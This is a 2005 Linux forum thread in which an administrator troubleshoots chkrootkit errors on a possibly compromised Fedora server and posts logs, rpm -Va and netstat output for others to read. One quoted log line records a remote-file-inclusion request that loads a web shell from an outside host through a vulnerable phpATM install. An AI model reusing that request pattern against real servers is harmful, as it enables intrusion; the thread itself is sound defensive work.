chkrootkit questions

rioguia · 05-25-2005, 08:38 AM

Can anyone suggest a better solution or explain how to fix there error messages from chkrootkit?

I suspect a Fedora Core 2 box was hacked through an unpatched php program. I have run the latest chkrootkit and get these error messages that seem to relate to unavailable system utilities. I have tried to replace all these by using RPM to force update the following packages from the Fedora Core 2 legacy page:

util-linux-2.12-18.i386.rpm
passwd-0.68-8.1.i386.rpm
net-tools-1.60-25.i386.rpm
initscripts-7.53-1.i386.rpm
procps-3.2.0-1.1.i386.rpm

I next updated them using yum -y update

All goes well but I still get these messages. Can anyone suggest a better solution or explain how to fix there error messages?

Quote:

......
Checking `ldsopreload'... can't exec ./strings-static, not tested

Checking `sniffer'... not tested: can't exec ./ifpromisc
.....

Checking `wted'... not tested: can't exec ./chkwtmp

.....

Checking `z2'... not tested: can't exec ./chklastlog
Checking `chkutmp'... not tested: can't exec ./chkutmp

Capt_Caveman · 05-25-2005, 10:09 AM

All goes well but I still get these messages. Can anyone suggest a better solution or explain how to fix there error messages?
Did you compile all the helper apps using 'make sense' ? If so, go to the chkrootkit dir and make sure they are present and executable. Also make sure you're running chkrootkit as root.

I suspect a Fedora Core 2 box was hacked through an unpatched php program.
What leads you to believe that? Running and unpatched version of PHP is pretty dangerous lately, but could you give us more details on what makes you think you were cracked.

I have tried to replace all these by using RPM to force update the following packages from the Fedora Core 2 legacy page:
If you were cracked, simply updating the trojaned binaries with new versions likely won't help, a full re-installation is required. That said, what does rpm -Va output?

Dr. Psy · 05-25-2005, 12:14 PM

With chkrootkit, in order to get those binaries working that said 'can't exec ./strings-static (etc), not tested', they need to be in the same directory as chkrootkit itself, and then you need to CD to that directory and execute chkrootkit from there(./chkrootkit). And then those binaries (which are part of chkrootkit) will work properly :-)

rioguia · 05-25-2005, 01:24 PM

Capt_Caveman thanks for your response.

Did I compile?
1. Yes, I compiled using "Make Sense"

2. What makes me think I was hacked?
a. LogWatch entries including:

Quote:

GET /phpATM/files/cmd.php.ns?page=http://xthost.info/w00t/shell.txt HTTP/1.1 with
response code(s) 200 200

GET /phpATM/files/cmd.php.ns HTTP/1.1 with response code(s)

and

Quote:

Error: Illegal request...: 1 Time(s)
Buffer I/O error on device fd0, l...: 333 Time(s)
end_request: I/O error, dev fd0, sector...: 348 Time(s)
end_request: I/O error, dev hdc, sector...: 1 Time(s)
hdc: command error: error=0x50...: 1 Time(s)
hdc: command error: status=0x51 { D...: 1 Time(s)
lost page write due to I/O error on fd0...: 1 Time(s)

I tried to down load these scripts and they contain references "<title>ZETHA WEB SHELL </title> (I could email text versions of these scripts)

b. I found files in /var/tmp and /tmp related to rOnin.htm

c. I found processes related to these (I piped these to a .txt file that I don't have access to them right now; I would love to get someone else's opinion on their legitimacy or a pointer to a good resource on standard linux processes that should be running on a server)
d. These entries look like a vulnerability noted at:
http://www.securityfocus.com/archive/1/398536?ref=rss

Regarding the rpm -Va
it noted several discrepancies and that's why I tried to reinstall them using rpm -u --force package name and then updated them using up2date.

Dr. Psy thanks for your response. I may not understand your suggestion to install these binaries in the same directory as chkroot. I followed the instruction in the README file so all the chkroot software is in the same directory. From my Google searches, it was suggested that these error messages were related to compromised utilities used by chkrootkit. Ist that wrong?

The README file indicates I can point chkrootkit to a utility installed on a floppy or cdrom disk. Could you point me to a utility disk that I could download that has the utilities?

Thanks again for you kind assistance.

Dr. Psy · 05-25-2005, 01:43 PM

hmmm...maybe I misunderstood your question.

these programs

Quote:

Checking `ldsopreload'... can't exec ./strings-static, not tested

Checking `sniffer'... not tested: can't exec ./ifpromisc
.....

Checking `wted'... not tested: can't exec ./chkwtmp

.....

Checking `z2'... not tested: can't exec ./chklastlog
Checking `chkutmp'... not tested: can't exec ./chkutmp

are binaries included with chkrootkit, not system utilites. If chkrootkit is not executed in the same directory as the above mentioned binaries, then you will get the exact error message you posted. Which means, that, if chkrootkit is in /bin (for example), then all those programs listed above need to also be in /bin. And when you execute chkrookit, you need to first cd to /bin. Otherwise, those binaries listed above will not be executed and you will get the error message that you printed.

If this is not your problem, then I apologize. However, if that is the case, then I dont understand your question!

rioguia · 05-25-2005, 11:46 PM

Dr. Psy
thanks. you were right but I don't understand why my approach is wrong. when I cd into /bin/chkrootkit and ./chkrootkit it works fine. but i get the error message when I use my crontab like this:
0 1 * * * /bin/chkrootkit/chkrootkit | mail -s "chkrootkit output" me@mydomain.com
why does this make a difference.

Capt_Caveman. The output of rpm -Va is very long. Here is some of the output:

.M....G. /dev/sda1
.M...... /dev/shm
......G. /dev/tty0
.M....G. /dev/tty1
.M....G. /dev/tty2
.M....G. /dev/tty3
.M....G. /dev/tty4
.M....G. /dev/tty5
.M....G. /dev/tty6
......G. /dev/tty7
S.5....T c /etc/rc.d/init.d/syslog
S.5....T c /etc/openldap/ldap.conf
S.?..... /usr/lib/libdns.so.11.0.2
S.?..... /usr/lib/libisc.so.7.0.1
S.?..... /usr/lib/libisccc.so.0.1.0
S.?..... /usr/lib/libisccfg.so.0.0.7
S.?..... /usr/lib/liblwres.so.1.1.1
S.5....T c /etc/pam_smb.conf
S.5....T c /etc/ssh/sshd_config
missing /usr/lib/perl5/vendor_perl/5.8.3/i386-linux-thread-multi/auto/mod_perl/.packlist
S.5....T c /etc/httpd/conf.d/webalizer.conf
S.5....T c /usr/share/a2ps/afm/fonts.map
S.5....T c /etc/httpd/conf/httpd.conf
.M...... /var/www/html
missing /lib/modules/2.6.9-1.11_FC2/build/.config
missing /lib/modules/2.6.9-1.11_FC2/build/scripts/.conmakehash.cmd
missing /lib/modules/2.6.9-1.11_FC2/build/scripts/.kallsyms.cmd
missing /lib/modules/2.6.9-1.11_FC2/build/scripts/.pnmtologo.cmd
missing /lib/modules/2.6.9-1.11_FC2/build/scripts/basic/.docproc.cmd
missing /lib/modules/2.6.9-1.11_FC2/build/scripts/basic/.fixdep.cmd
missing /lib/modules/2.6.9-1.11_FC2/build/scripts/basic/.split-include.cmd
missing /lib/modules/2.6.9-1.11_FC2/build/scripts/genksyms/.genksyms.cmd
missing /lib/modules/2.6.9-1.11_FC2/build/scripts/genksyms/.genksyms.o.cmd
missing /lib/modules/2.6.9-1.11_FC2/build/scripts/genksyms/.lex.o.cmd
missing /lib/modules/2.6.9-1.11_FC2/build/scripts/genksyms/.parse.o.cmd
missing /lib/modules/2.6.9-1.11_FC2/build/scripts/kconfig/.conf.cmd
missing /lib/modules/2.6.9-1.11_FC2/build/scripts/kconfig/.conf.o.cmd
missing /lib/modules/2.6.9-1.11_FC2/build/scripts/kconfig/.libkconfig.so.cmd
missing /lib/modules/2.6.9-1.11_FC2/build/scripts/kconfig/.mconf.o.cmd
missing /lib/modules/2.6.9-1.11_FC2/build/scripts/kconfig/.zconf.tab.o.cmd
missing /lib/modules/2.6.9-1.11_FC2/build/scripts/mod/.elfconfig.h.cmd
missing /lib/modules/2.6.9-1.11_FC2/build/scripts/mod/.empty.o.cmd
missing /lib/modules/2.6.9-1.11_FC2/build/scripts/mod/.file2alias.o.cmd
missing /lib/modules/2.6.9-1.11_FC2/build/scripts/mod/.mk_elfconfig.cmd
missing /lib/modules/2.6.9-1.11_FC2/build/scripts/mod/.modpost.cmd
missing /lib/modules/2.6.9-1.11_FC2/build/scripts/mod/.modpost.o.cmd
missing /lib/modules/2.6.9-1.11_FC2/build/scripts/mod/.sumversion.o.cmd
S.5....T c /etc/samba/smb.conf
......G. /var/cache/samba/winbindd_privileged
missing /lib/modules/2.6.10-1.770_FC2/build/.config
missing /lib/modules/2.6.10-1.770_FC2/build/scripts/.conmakehash.cmd
missing /lib/modules/2.6.10-1.770_FC2/build/scripts/.kallsyms.cmd
missing /lib/modules/2.6.10-1.770_FC2/build/scripts/.pnmtologo.cmd
missing /lib/modules/2.6.10-1.770_FC2/build/scripts/basic/.docproc.cmd
missing /lib/modules/2.6.10-1.770_FC2/build/scripts/basic/.fixdep.cmd
missing /lib/modules/2.6.10-1.770_FC2/build/scripts/basic/.split-include.cmd
missing /lib/modules/2.6.10-1.770_FC2/build/scripts/genksyms/.genksyms.cmd
missing /lib/modules/2.6.10-1.770_FC2/build/scripts/genksyms/.genksyms.o.cmd
missing /lib/modules/2.6.10-1.770_FC2/build/scripts/genksyms/.lex.o.cmd
missing /lib/modules/2.6.10-1.770_FC2/build/scripts/genksyms/.parse.o.cmd
missing /lib/modules/2.6.10-1.770_FC2/build/scripts/kconfig/.conf.cmd
missing /lib/modules/2.6.10-1.770_FC2/build/scripts/kconfig/.conf.o.cmd
missing /lib/modules/2.6.10-1.770_FC2/build/scripts/kconfig/.mconf.o.cmd
missing /lib/modules/2.6.10-1.770_FC2/build/scripts/kconfig/.zconf.tab.o.cmd
missing /lib/modules/2.6.10-1.770_FC2/build/scripts/mod/.elfconfig.h.cmd
missing /lib/modules/2.6.10-1.770_FC2/build/scripts/mod/.empty.o.cmd
missing /lib/modules/2.6.10-1.770_FC2/build/scripts/mod/.file2alias.o.cmd
missing /lib/modules/2.6.10-1.770_FC2/build/scripts/mod/.mk_elfconfig.cmd
missing /lib/modules/2.6.10-1.770_FC2/build/scripts/mod/.modpost.cmd
missing /lib/modules/2.6.10-1.770_FC2/build/scripts/mod/.modpost.o.cmd
missing /lib/modules/2.6.10-1.770_FC2/build/scripts/mod/.sumversion.o.cmd
missing /usr/lib/perl5/5.8.3/i386-linux-thread-multi/.packlist
S.5....T c /etc/pam.d/system-auth
missing /lib/modules/2.6.5-1.358/build/.config
missing /lib/modules/2.6.5-1.358/build/scripts/.bin2c.cmd
missing /lib/modules/2.6.5-1.358/build/scripts/.conmakehash.cmd
missing /lib/modules/2.6.5-1.358/build/scripts/.elfconfig.h.cmd
mmissing /lib/modules/2.6.5-1.358/build/scripts/.file2alias.o.cmd
missing /lib/modules/2.6.5-1.358/build/scripts/.kallsyms.cmd
missing /lib/modules/2.6.5-1.358/build/scripts/.mk_elfconfig.cmd
missing /lib/modules/2.6.5-1.358/build/scripts/.modpost.cmd
missing /lib/modules/2.6.5-1.358/build/scripts/.modpost.o.cmd
missing /lib/modules/2.6.5-1.358/build/scripts/.pnmtologo.cmd
missing /lib/modules/2.6.5-1.358/build/scripts/.sumversion.o.cmd
missing /lib/modules/2.6.5-1.358/build/scripts/basic/.docproc.cmd
missing /lib/modules/2.6.5-1.358/build/scripts/basic/.fixdep.cmd
missing /lib/modules/2.6.5-1.358/build/scripts/basic/.split-include.cmd
missing /lib/modules/2.6.5-1.358/build/scripts/kconfig/.conf.cmd
missing /lib/modules/2.6.5-1.358/build/scripts/kconfig/.conf.o.cmd
missing /lib/modules/2.6.5-1.358/build/scripts/kconfig/.libkconfig.so.cmd
missing /lib/modules/2.6.5-1.358/build/scripts/kconfig/.mconf.o.cmd
missing /lib/modules/2.6.5-1.358/build/scripts/kconfig/.zconf.tab.o.cmd
S.5....T c /etc/krb.conf
S.5....T /usr/bin/dig
S.5....T /usr/bin/host
S.5....T /usr/bin/nslookup
S.5....T /usr/bin/nsupdate
.......T c /etc/yp.conf
S.5....T c /etc/ldap.conf
.......T /usr/lib/security/classpath.security
.......T /usr/lib/security/libgcj.security
S.5....T c /etc/php.ini
.M...... /var/lib/php/session
..5....T c /etc/inittab
missing /lib/modules/2.6.10-1.9_FC2/build/.config
missing /lib/modules/2.6.10-1.9_FC2/build/scripts/.conmakehash.cmd
missing /lib/modules/2.6.10-1.9_FC2/build/scripts/.kallsyms.cmd
missing /lib/modules/2.6.10-1.9_FC2/build/scripts/.pnmtologo.cmd
missing /lib/modules/2.6.10-1.9_FC2/build/scripts/basic/.docproc.cmd
missing /lib/modules/2.6.10-1.9_FC2/build/scripts/basic/.fixdep.cmd
missing /lib/modules/2.6.10-1.9_FC2/build/scripts/basic/.split-include.cmd
missing /lib/modules/2.6.10-1.9_FC2/build/scripts/genksyms/.genksyms.cmd
missing /lib/modules/2.6.10-1.9_FC2/build/scripts/genksyms/.genksyms.o.cmd
missing /lib/modules/2.6.10-1.9_FC2/build/scripts/genksyms/.lex.o.cmd
missing /lib/modules/2.6.10-1.9_FC2/build/scripts/genksyms/.parse.o.cmd
issing /lib/modules/2.6.5-1.358/build/scripts/.empty.o.cmd
missing /lib/modules/2.6.10-1.9_FC2/build/scripts/kconfig/.conf.cmd
missing /lib/modules/2.6.10-1.9_FC2/build/scripts/kconfig/.conf.o.cmd
missing /lib/modules/2.6.10-1.9_FC2/build/scripts/kconfig/.mconf.o.cmd
missing /lib/modules/2.6.10-1.9_FC2/build/scripts/kconfig/.zconf.tab.o.cmd
missing /lib/modules/2.6.10-1.9_FC2/build/scripts/mod/.elfconfig.h.cmd
missing /lib/modules/2.6.10-1.9_FC2/build/scripts/mod/.empty.o.cmd
missing /lib/modules/2.6.10-1.9_FC2/build/scripts/mod/.file2alias.o.cmd
missing /lib/modules/2.6.10-1.9_FC2/build/scripts/mod/.mk_elfconfig.cmd
missing /lib/modules/2.6.10-1.9_FC2/build/scripts/mod/.modpost.cmd
missing /lib/modules/2.6.10-1.9_FC2/build/scripts/mod/.modpost.o.cmd
missing /lib/modules/2.6.10-1.9_FC2/build/scripts/mod/.sumversion.o.cmd
S.5....T c /etc/dovecot.conf
.......T /usr/share/zoneinfo/Africa/Abidjan

SKIPPED PAGES OF DATA LIKE THIS FOR THE ZONEINFO FILES

.......T /usr/share/zoneinfo/right/Zulu
.......T /usr/share/zoneinfo/zone.tab
missing /lib/modules/2.6.10-1.12_FC2/build/.config
missing /lib/modules/2.6.10-1.12_FC2/build/scripts/.conmakehash.cmd
missing /lib/modules/2.6.10-1.12_FC2/build/scripts/.kallsyms.cmd
missing /lib/modules/2.6.10-1.12_FC2/build/scripts/.pnmtologo.cmd
missing /lib/modules/2.6.10-1.12_FC2/build/scripts/basic/.docproc.cmd
missing /lib/modules/2.6.10-1.12_FC2/build/scripts/basic/.fixdep.cmd
missing /lib/modules/2.6.10-1.12_FC2/build/scripts/basic/.split-include.cmd
missing /lib/modules/2.6.10-1.12_FC2/build/scripts/genksyms/.genksyms.cmd
missing /lib/modules/2.6.10-1.12_FC2/build/scripts/genksyms/.genksyms.o.cmd
missing /lib/modules/2.6.10-1.12_FC2/build/scripts/genksyms/.lex.o.cmd
missing /lib/modules/2.6.10-1.12_FC2/build/scripts/genksyms/.parse.o.cmd
missing /lib/modules/2.6.10-1.12_FC2/build/scripts/kconfig/.conf.cmd
missing /lib/modules/2.6.10-1.12_FC2/build/scripts/kconfig/.conf.o.cmd
missing /lib/modules/2.6.10-1.12_FC2/build/scripts/kconfig/.mconf.o.cmd
missing /lib/modules/2.6.10-1.12_FC2/build/scripts/kconfig/.zconf.tab.o.cmd
missing /lib/modules/2.6.10-1.12_FC2/build/scripts/mod/.elfconfig.h.cmd
missing /lib/modules/2.6.10-1.12_FC2/build/scripts/mod/.empty.o.cmd
missing /lib/modules/2.6.10-1.12_FC2/build/scripts/mod/.file2alias.o.cmd
missing /lib/modules/2.6.10-1.12_FC2/build/scripts/mod/.mk_elfconfig.cmd
missing /lib/modules/2.6.10-1.12_FC2/build/scripts/mod/.modpost.cmd
missing /lib/modules/2.6.10-1.12_FC2/build/scripts/mod/.modpost.o.cmd
missing /lib/modules/2.6.10-1.12_FC2/build/scripts/mod/.sumversion.o.cmd
S.5....T /usr/lib/mozilla-1.7.6/searchplugins/google.src
S.5....T c /etc/my.cnf
S.5....T c /etc/xml/catalog
S.5....T c /usr/share/sgml/docbook/xmlcatalog
.......T /usr/bin/addr2name.awk
S.?..... /usr/lib/lib-javax-activation-20030319.so
S.5....T c /etc/ppp/chap-secrets
S.5....T c /etc/ppp/pap-secrets
S.5....T c /etc/sysconfig/pcmcia
..5....T c /etc/sysconfig/system-config-users
.......T /usr/share/system-config-users/groupProperties.pyc
.......T /usr/share/system-config-users/groupWindow.pyc
.......T /usr/share/system-config-users/mainWindow.pyc
.......T /usr/share/system-config-users/messageDialog.pyc
missing /usr/share/system-config-users/selinux.pyc
missing /usr/share/system-config-users/system-config-users.pyc
.......T /usr/share/system-config-users/userGroupCheck.pyc
.......T /usr/share/system-config-users/userProperties.pyc
.......T /usr/share/system-config-users/userWindow.pyc
SM5....T c /etc/sysconfig/rhn/up2date
S.5....T c /etc/sysconfig/rhn/up2date-uuid
S.?..... /usr/lib/lib-org-apache-bcel-5.0.so
S.5....T c /etc/sysconfig/system-config-securitylevel
S.5....T c /etc/X11/gdm/gdm.conf
S.5....T c /etc/sysconfig/rhn/rhn-applet
SM5....T /usr/share/rhn/rhn_applet/rhn_applet.pyc
SM5....T /usr/share/rhn/rhn_applet/rhn_applet_animation.pyc
SM5....T /usr/share/rhn/rhn_applet/rhn_applet_apt.pyc
SM5....T /usr/share/rhn/rhn_applet/rhn_applet_dialogs.pyc
SM5....T /usr/share/rhn/rhn_applet/rhn_applet_model.pyc
SM5....T /usr/share/rhn/rhn_applet/rhn_applet_protocols.pyc
SM5....T /usr/share/rhn/rhn_applet/rhn_applet_rpc.pyc
SM5....T /usr/share/rhn/rhn_applet/rhn_applet_rpm.pyc
SM5....T /usr/share/rhn/rhn_applet/rhn_applet_version.pyc
SM5....T /usr/share/rhn/rhn_applet/rhn_applet_yum.pyc
SM5....T /usr/share/rhn/rhn_applet/rhn_sources.pyc
SM5....T /usr/share/rhn/rhn_applet/rhn_utils.pyc
S.?..... /usr/lib/lib-javax-mail-20031006.so
S.5....T c /etc/postfix/aliases
S.5....T c /etc/postfix/aliases.db
S.5....T c /etc/postfix/main.cf
S.5....T c /etc/postfix/virtual
missing /lib/modules/2.6.10-1.8_FC2/build/.config
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/.conmakehash.cmd
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/.kallsyms.cmd
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/.conmakehash.cmd
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/.kallsyms.cmd
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/.pnmtologo.cmd
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/basic/.docproc.cmd
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/basic/.fixdep.cmd
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/basic/.split-include.cmd
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/genksyms/.genksyms.cmd
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/genksyms/.genksyms.o.cmd
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/genksyms/.lex.o.cmd
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/genksyms/.parse.o.cmd
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/kconfig/.conf.cmd
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/kconfig/.conf.o.cmd
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/kconfig/.mconf.o.cmd
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/kconfig/.zconf.tab.o.cmd
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/mod/.elfconfig.h.cmd
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/mod/.empty.o.cmd
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/mod/.file2alias.o.cmd
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/mod/.mk_elfconfig.cmd
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/mod/.modpost.cmd
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/mod/.modpost.o.cmd
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/mod/.sumversion.o.cmd
missing /lib/modules/2.6.10-1.14_FC2/build/.config
missing /lib/modules/2.6.10-1.14_FC2/build/scripts/.conmakehash.cmd
missing /lib/modules/2.6.10-1.14_FC2/build/scripts/.kallsyms.cmd
missing /lib/modules/2.6.10-1.14_FC2/build/scripts/.pnmtologo.cmd
missing /lib/modules/2.6.10-1.14_FC2/build/scripts/basic/.docproc.cmd
missing /lib/modules/2.6.10-1.14_FC2/build/scripts/basic/.fixdep.cmd
missing /lib/modules/2.6.10-1.14_FC2/build/scripts/basic/.split-include.cmd
missing /lib/modules/2.6.10-1.14_FC2/build/scripts/genksyms/.genksyms.cmd
missing /lib/modules/2.6.10-1.14_FC2/build/scripts/genksyms/.genksyms.o.cmd
missing /lib/modules/2.6.10-1.14_FC2/build/scripts/genksyms/.lex.o.cmd
missing /lib/modules/2.6.10-1.14_FC2/build/scripts/genksyms/.parse.o.cmd
missing /lib/modules/2.6.10-1.14_FC2/build/scripts/kconfig/.conf.cmd
missing /lib/modules/2.6.10-1.14_FC2/build/scripts/kconfig/.conf.o.cmd
missing /lib/modules/2.6.10-1.14_FC2/build/scripts/kconfig/.mconf.o.cmd
missing /lib/modules/2.6.10-1.14_FC2/build/scripts/kconfig/.zconf.tab.o.cmd
missing /lib/modules/2.6.10-1.14_FC2/build/scripts/mod/.elfconfig.h.cmd
missing /lib/modules/2.6.10-1.14_FC2/build/scripts/mod/.empty.o.cmd
missing /lib/modules/2.6.10-1.14_FC2/build/scripts/mod/.file2alias.o.cmd
missing /lib/modules/2.6.10-1.14_FC2/build/scripts/mod/.mk_elfconfig.cmd
missing /lib/modules/2.6.10-1.14_FC2/build/scripts/mod/.modpost.cmd
missing /lib/modules/2.6.10-1.14_FC2/build/scripts/mod/.modpost.o.cmd
missing /lib/modules/2.6.10-1.14_FC2/build/scripts/mod/.sumversion.o.cmd
missing /lib/modules/2.6.10-1.771_FC2/build/.config
missing /lib/modules/2.6.10-1.771_FC2/build/scripts/.conmakehash.cmd
missing /lib/modules/2.6.10-1.771_FC2/build/scripts/.kallsyms.cmd
missing /lib/modules/2.6.10-1.771_FC2/build/scripts/.pnmtologo.cmd
missing /lib/modules/2.6.10-1.771_FC2/build/scripts/basic/.docproc.cmd
missing /lib/modules/2.6.10-1.771_FC2/build/scripts/basic/.fixdep.cmd
missing /lib/modules/2.6.10-1.771_FC2/build/scripts/basic/.split-include.cmd
missing /lib/modules/2.6.10-1.771_FC2/build/scripts/genksyms/.genksyms.cmd
missing /lib/modules/2.6.10-1.771_FC2/build/scripts/genksyms/.genksyms.o.cmd
missing /lib/modules/2.6.10-1.771_FC2/build/scripts/genksyms/.lex.o.cmd
missing /lib/modules/2.6.10-1.771_FC2/build/scripts/genksyms/.parse.o.cmd
missing /lib/modules/2.6.10-1.771_FC2/build/scripts/kconfig/.conf.cmd
missing /lib/modules/2.6.10-1.771_FC2/build/scripts/kconfig/.conf.o.cmd
missing /lib/modules/2.6.10-1.771_FC2/build/scripts/kconfig/.mconf.o.cmd
missing /lib/modules/2.6.10-1.771_FC2/build/scripts/kconfig/.zconf.tab.o.cmd
missing /lib/modules/2.6.10-1.771_FC2/build/scripts/mod/.elfconfig.h.cmd
missing /lib/modules/2.6.10-1.771_FC2/build/scripts/mod/.empty.o.cmd
missing /lib/modules/2.6.10-1.771_FC2/build/scripts/mod/.file2alias.o.cmd
missing /lib/modules/2.6.10-1.771_FC2/build/scripts/mod/.mk_elfconfig.cmd
missing /lib/modules/2.6.10-1.771_FC2/build/scripts/mod/.modpost.cmd
missing /lib/modules/2.6.10-1.771_FC2/build/scripts/mod/.modpost.o.cmd
missing /lib/modules/2.6.10-1.771_FC2/build/scripts/mod/.sumversion.o.cmd

Capt_Caveman · 05-25-2005, 11:49 PM

GET /phpATM/files/cmd.php.ns?page=http://xthost.info/w00t/shell.txt HTTP/1.1 with response code(s) 200 200
GET /phpATM/files/cmd.php.ns HTTP/1.1 with response code(s)
These are both phpATM vulnerabilities, so you'd need to have it installed. You can see info on the bug these exploit here.

and Error: Illegal request...: 1 Time(s)
....
lost page write due to I/O error on fd0...: 1 Time(s)
These look like drive read errors that you'll often see with hardware problems (like harddrive DMA issues for example). Not sure, but these may be unrelated (especially the fd (floppy drive) errors).

c. I found processes related to these (I piped these to a .txt file that I don't have access to them right now; I would love to get someone else's opinion on their legitimacy or a pointer to a good resource on standard linux processes that should be running on a server)
Could you describe them in a little more detail?

d. These entries look like a vulnerability noted at:
http://www.securityfocus.com/archive/1/398536?ref=rss
Slightly different bug. If this was the exploited vuln, you'd see the string "include_location" in the URL.

rioguia · 05-26-2005, 05:23 AM

Capt_Caveman THANKS

Here is a list of active network connections on my machine that runs DNS, mysql, Dovcot, Postfix, and httpd (apache 2.x) at run level 5 using GNOME. If you see anything suspicious, please let me know:

Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 *:mysql *:* LISTEN 2752/mysqld
tcp 0 0 testy.substantis:domain *:* LISTEN 2698/named
tcp 0 0 testy.substantis:domain *:* LISTEN 2686/named
tcp 0 0 *:smtp *:* LISTEN 2816/master
tcp 0 0 testy.substantis.:32826 download.fedora.re:http TIME_WAIT -
tcp 0 0 testy.substantis.:32825 download.fedora.re:http TIME_WAIT -
tcp 0 0 *:imaps *:* LISTEN 2664/dovecot
tcp 0 0 *

op3s *:* LISTEN 2664/dovecot
tcp 0 0 *

op3 *:* LISTEN 2664/dovecot
tcp 0 0 *:imap *:* LISTEN 2664/dovecot
tcp 0 0 *:http *:* LISTEN 2842/httpd
tcp 0 0 *:smtp *:* LISTEN 2816/master
tcp 0 0 *:https *:* LISTEN 2842/httpd
udp 0 0 *:32768 *:* 2686/named
udp 0 0 *:domain *:* 2698/named
udp 0 0 testy.substantis:domain *:* 2698/named
udp 0 0 testy.substantis:domain *:* 2686/named
udp 0 0 *:32769 *:* 2686/named
udp 0 0 *:32770 *:* 2698/named
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node PID/Program name Path
unix 21 [ ] DGRAM 2713 2551/syslogd /dev/log
unix 2 [ ACC ] STREAM LISTENING 3622 2942/gdm-binary /tmp/.gdm_socket
unix 2 [ ACC ] STREAM LISTENING 3349 2873/xfs /tmp/.font-unix/fs7100
unix 2 [ ACC ] STREAM LISTENING 3644 3137/X /tmp/.X11-unix/X0
unix 2 [ ACC ] STREAM LISTENING 22112 4945/ssh-agent /tmp/ssh-AXJF4883/agent.4883
unix 2 [ ACC ] STREAM LISTENING 22550 5099/mapping-daemon /tmp/mapping-root
unix 2 [ ACC ] STREAM LISTENING 22138 4955/gconfd-2 /tmp/orbit-root/linc-135b-0-913911484fef
unix 2 [ ACC ] STREAM LISTENING 22147 4883/gnome-session /tmp/orbit-root/linc-1313-0-548572a49c081
unix 2 [ ACC ] STREAM LISTENING 22259 4883/gnome-session /tmp/.ICE-unix/4883
unix 2 [ ACC ] STREAM LISTENING 3404 2907/dbus-daemon-1 /var/run/dbus/system_bus_socket
unix 2 [ ACC ] STREAM LISTENING 22267 4958/gnome-keyring- /tmp/keyring-IVOTlz/socket
unix 2 [ ACC ] STREAM LISTENING 22277 4960/bonobo-activat /tmp/orbit-root/linc-1360-0-8c88a678485
unix 2 [ ACC ] STREAM LISTENING 22298 4962/gnome-settings /tmp/orbit-root/linc-1362-0-5fac0d92c7ccc
unix 2 [ ACC ] STREAM LISTENING 22436 5064/metacity /tmp/orbit-root/linc-13c8-0-55f17d47e3b3f
unix 2 [ ACC ] STREAM LISTENING 22459 5066/gnome-panel /tmp/orbit-root/linc-13ca-0-5c04673fb9fb8
unix 2 [ ACC ] STREAM LISTENING 22478 5068/nautilus /tmp/orbit-root/linc-13cc-0-4e34f8a919b28
unix 2 [ ACC ] STREAM LISTENING 22516 5076/gnome-vfs-daem /tmp/orbit-root/linc-13d4-0-742590725e6f6
unix 2 [ ACC ] STREAM LISTENING 22592 5103/notification-a /tmp/orbit-root/linc-13ef-0-4f6434af581e4
unix 2 [ ACC ] STREAM LISTENING 22621 5105/wnck-applet /tmp/orbit-root/linc-13f1-0-4f6434afdf143
unix 2 [ ACC ] STREAM LISTENING 22644 5072/python /tmp/orbit-root/linc-13d0-0-79135e0847e32
unix 2 [ ACC ] STREAM LISTENING 22741 5107/gnome-terminal /tmp/orbit-root/linc-13f3-0-618ed24758313
unix 2 [ ACC ] STREAM LISTENING 3245 2828/gpm /dev/gpmctl
unix 2 [ ACC ] STREAM LISTENING 3136 2816/master public/cleanup
unix 2 [ ACC ] STREAM LISTENING 3143 2816/master private/rewrite
unix 2 [ ACC ] STREAM LISTENING 3147 2816/master private/bounce
unix 2 [ ACC ] STREAM LISTENING 3151 2816/master private/defer
unix 2 [ ACC ] STREAM LISTENING 3155 2816/master public/flush
unix 2 [ ACC ] STREAM LISTENING 3159 2816/master private/proxymap
unix 2 [ ACC ] STREAM LISTENING 3163 2816/master private/smtp
unix 2 [ ACC ] STREAM LISTENING 3167 2816/master private/relay
unix 2 [ ACC ] STREAM LISTENING 3171 2816/master public/showq
unix 2 [ ACC ] STREAM LISTENING 3175 2816/master private/error
unix 2 [ ACC ] STREAM LISTENING 3179 2816/master private/local
unix 2 [ ACC ] STREAM LISTENING 3183 2816/master private/virtual
unix 2 [ ACC ] STREAM LISTENING 3187 2816/master private/lmtp
unix 2 [ ACC ] STREAM LISTENING 3191 2816/master private/maildrop
unix 2 [ ACC ] STREAM LISTENING 3195 2816/master private/old-cyrus
unix 2 [ ACC ] STREAM LISTENING 3199 2816/master private/cyrus
unix 2 [ ACC ] STREAM LISTENING 3203 2816/master private/uucp
unix 2 [ ACC ] STREAM LISTENING 3207 2816/master private/ifmail
unix 2 [ ACC ] STREAM LISTENING 3211 2816/master private/bsmtp
unix 2 [ ACC ] STREAM LISTENING 2899 2664/dovecot /var/run/dovecot-login/default
unix 2 [ ACC ] STREAM LISTENING 3008 2752/mysqld /var/lib/mysql/mysql.sock
unix 2 [ ] DGRAM 2715 2551/syslogd /home/chroot-dns-int/dev/log
unix 2 [ ] DGRAM 2717 2551/syslogd /home/chroot-dns-ext/dev/log
unix 3 [ ] STREAM CONNECTED 22757 5108/gnome-pty-help
unix 3 [ ] STREAM CONNECTED 22756 5107/gnome-terminal
